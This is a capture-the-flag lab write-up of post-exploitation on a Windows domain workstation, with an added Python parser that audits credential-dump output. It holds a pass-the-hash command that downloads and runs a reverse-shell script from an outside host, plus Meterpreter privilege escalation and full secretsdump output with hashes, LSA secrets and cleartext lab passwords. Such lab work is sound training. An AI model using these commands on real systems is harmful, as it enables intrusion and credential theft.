Steps After Obtaining a Reverse Shell
Getting the Reverse Shell
After failed attempts with the other tools, I decided to use crackmapexec to execute a PowerShell command directly.
proxychains crackmapexec smb 172.16.1.101 -u wsadmin -H 669b12a3bac275251170afbe2c5de8c2 /domain:corp.local -X "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.135:8000/large1.ps1')"
# Python web server up and running in the directory where large1.ps1 is located, with the port value changed
# nc listener up and running
#powershell -c
After performing the above actions I got the reverse shell.
Enumeration
I found a new flag in the Desktop folder of wsadmin.
OFFSHORE{mimikatz_d03s_th3_j0b}
I also checked the Backup directory and found credentials for the svc_iis user.
<authentication mode="Forms">
<credentials passwordFormat="Clear">
<user name="svc_iis" password="Vintage!" />
</credentials>
Using the Password
As soon as I obtain a new set of credentials, the next step is to use crackmapexec to check whether I have access to any systems, and voilà! I got access on the same system. So I now don't need to use the hash anymore.
proxychains crackmapexec smb 172.16.1.0/24 -u svc_iis -p Vintage!
[+] corp.local\svc_iis:Vintage! (Pwn3d!)
Accessing the machine with the newly obtained set of credentials
- No access with xfreerdp (I really need to figure it out)
I then tried using Evil-WinRM.
proxychains evil-winrm -i 172.16.1.101 -u svc_iis -p Vintage!
Uploading the Meterpreter shell
upload reverse.exe
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:d317b8ce3dd5098589c047a220cf0b12:::
Problems with the Meterpreter shell
Impacket in action
└─$ proxychains impacket-secretsdump 'corp.local/svc_iis:Vintage!@172.16.1.101'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.1.101:445 ... OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x54a7f6c97fd9cf227f4854cdecc675c2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:d317b8ce3dd5098589c047a220cf0b12:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/iamtheadministrator:$DCC2$10240#iamtheadministrator#3c1e5b31c203b2b52920f7ce19110ab4
CORP.LOCAL/wsadmin:$DCC2$10240#wsadmin#fd88913b9ecd31d42d450b4c92df1c7c
CORP.LOCAL/ned.flanders_adm:$DCC2$10240#ned.flanders_adm#f29265de0b0a15746aaba163f152d716
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\WS02$:aes256-cts-hmac-sha1-96:dd6bfdd43a405922d7d002601b0b271a35e8d28e728e452bc8854961b0bf60b6
CORP\WS02$:aes128-cts-hmac-sha1-96:4f85935f31c56413248afb81b6ba8646
CORP\WS02$:des-cbc-md5:badfd96d34f258ea
CORP\WS02$:plain_password_hex:2000430028002c00580048002f0043003c00500061007a00310041003e007300460020007a0066002e006a00600056002f005e005f0054002e002200410071002f006c0023006300440069007400520077003c00420040006d002e0037002f0065002c003b004f005e004d002a005200480071002f007300710046006c004a006200210047004c006f00740049005c004e00350066003600560035003700310051005a0029004b004f003b002a005d004d0067006e004800570024003c005b007400780052004e0079006700480079003000410078006a0060005b0065002f00650067006b005400350062006c003400
CORP\WS02$:aad3b435b51404eeaad3b435b51404ee:c72e375bed0918ced38b7a8d3e7f5e09:::
[*] DefaultPassword
(Unknown User):Workstationadmin1!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x4710434207883cdf6d1358ed9a8baeefd80bae5c
dpapi_userkey:0x72351cfde99a602e9db7e43c4a6af6888ce743a8
[*] NL$KM
0000 72 C4 A9 DE F2 8D 95 21 1E 5F EA CD 63 3F A8 36 r......!._..c?.6
0010 31 8A 48 04 5C E4 7B 3D 98 AE 6D 70 A4 07 56 23 1.H.\.{=..mp..V#
0020 76 15 8F 1C 29 6F 33 10 B7 38 FA B4 F6 6A 5B 6E v...)o3..8...j[n
0030 52 52 F3 55 B3 BB D6 9E D1 E0 6B 48 91 83 F8 29 RR.U......kH...)
NL$KM:72c4a9def28d95211e5feacd633fa836318a48045ce47b3d98ae6d70a407562376158f1c296f3310b738fab4f66a5b6e5252f355b3bbd69ed1e06b489183f829
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Password cracked for wsadmin
SMB 172.16.1.101 445 WS02 [+] corp.local\wsadmin:Workstationadmin1! (Pwn3d!)
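As an added example (not code from the original write-up), a small parser for the secretsdump output shown above that extracts the findings a defender would report from such a dump: local accounts whose NT hash is the empty-string hash, cached domain logons left on the workstation, and a cleartext autologon DefaultPassword held in LSA secrets (the same secret that yielded the wsadmin password above). The sample input is constructed from the lines shown on this page.

```python
import re

# Constructed sample in the format impacket-secretsdump printed above
# (SAM hashes, cached DCC2 logons, DefaultPassword LSA secret); lab values only.
SAMPLE_OUTPUT = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:d317b8ce3dd5098589c047a220cf0b12:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/iamtheadministrator:$DCC2$10240#iamtheadministrator#3c1e5b31c203b2b52920f7ce19110ab4
CORP.LOCAL/wsadmin:$DCC2$10240#wsadmin#fd88913b9ecd31d42d450b4c92df1c7c
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):Workstationadmin1!
[*] Cleaning up...
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
SAM_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$")
# DCC2 line: DOMAIN/user:$DCC2$<iterations>#user#<hash>; \2 forces the user to repeat
DCC2_RE = re.compile(r"^([^/]+)/([^:]+):\$DCC2\$(\d+)#\2#([0-9a-f]{32})$")


def audit_secretsdump(text):
    """Walk secretsdump output section by section; return (finding, subject) tuples."""
    findings = []
    section = None
    for line in text.splitlines():
        if line.startswith("[*] "):       # every "[*] ..." line opens a new section
            section = line[4:]
            continue
        if section is None:
            continue
        if section.startswith("Dumping local SAM"):
            m = SAM_RE.match(line)
            if m and m.group(4) == EMPTY_NT:
                findings.append(("blank_password", m.group(1)))
        elif section.startswith("Dumping cached domain"):
            m = DCC2_RE.match(line)
            if m:
                findings.append(("cached_domain_logon", f"{m.group(1)}\\{m.group(2)}"))
        elif section == "DefaultPassword" and line.strip():
            # report which principal has an autologon secret, not the value itself
            findings.append(("autologon_cleartext", line.split(":", 1)[0]))
    return findings
```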